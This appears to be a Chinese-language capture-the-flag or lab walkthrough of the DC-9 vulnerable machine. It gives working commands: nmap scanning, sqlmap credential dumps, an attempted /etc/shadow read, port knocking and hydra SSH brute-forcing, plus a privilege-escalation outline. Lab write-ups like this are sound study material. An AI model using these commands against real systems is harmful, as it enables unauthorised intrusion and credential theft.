信息收集
nmap -sP 192.168..
目标开放80端口,进行访问;
然后在进行目录的收集:
并没什么用。。。。。
在浏览网页时,发现有用户信息:
得到用户信息后,在查询功能处进行查询:
有错误的回显,可能存在SQL注入;
使用sqlmap进行验证:
获得数据库名;接着进行表和数据的获取:
sqlmap.py -r C:\Users\Dell\Desktop\test.txt -p search -D users -tables
sqlmap.py -r C:\Users\Dell\Desktop\test.txt -p search -D users -T UserDetails --columns
sqlmap.py -r C:\Users\Dell\Desktop\test.txt -p search -D users -T UserDetails -C firstname,lastname,username,password --dump
获取到用户名与密码后,进行ssh登录:
ssh服务拒绝连接;
然后在进行另一个数据库的信息获取:
sqlmap.py -r C:\Users\Dell\Desktop\test.txt -p search -D Staff -tables
sqlmap.py -r C:\Users\Dell\Desktop\test.txt -p search -D Staff -T StaffDetails --columns
sqlmap.py -r C:\Users\Dell\Desktop\test.txt -p search -D Staff -T Users --columns
sqlmap.py -r C:\Users\Dell\Desktop\test.txt -p search -D Staff -T Users -C UserID,Username,Password --dump
得到用户密码之后,进行登录:
登录成功!!
看到了有个文件不存在的提示,尝试读取文件:
但是读取etc/shadow失败!!
之前在进行端口扫描时,22端口开放,但是连接时拒绝连接,在查看前辈的文章后得知,将端口进行了配置,所以要找端口配置之后生成的文件:/etc/knockd.conf:
参考连接:
得到了自定义的端口,要将定义的端口全部打开,在进行ssh的连接:
nmap -p 7469 192.168.43.169
namp -p 8475 192.168.43.169
namp -p 9842 192.168.43.169
打开22端口,然后进行登录;
将之前sqlmap爆破的用户名与密码,使用hydry进行爆破:
hydra -L /root/userdc9 -P /root/passwddc9 192.168.43.169 ssh
在用户janitor中发现存在有个密码文件,将其放入passwddc9中再次进行爆破:
进入用户fredf,查看无密码登录的权限:
提权
制作一个用户,可以免密登录的权限:
参考文章:https://blog.csdn.net/weixin_44426869/article/details/104918662?ops_request_misc=%257B%2522request%255Fid%2522%253A%2522162743796316780262566914%2522%252C%2522scm%2522%253A%252220140713.130102334…%2522%257D&request_id=162743796316780262566914&biz_id=0&utm_medium=distribute.pc_search_result.none-task-blog-2allsobaiduend~default-1-104918662.first_rank_v2_pc_rank_v29&utm_term=dc9&spm=1018.2226.3001.4187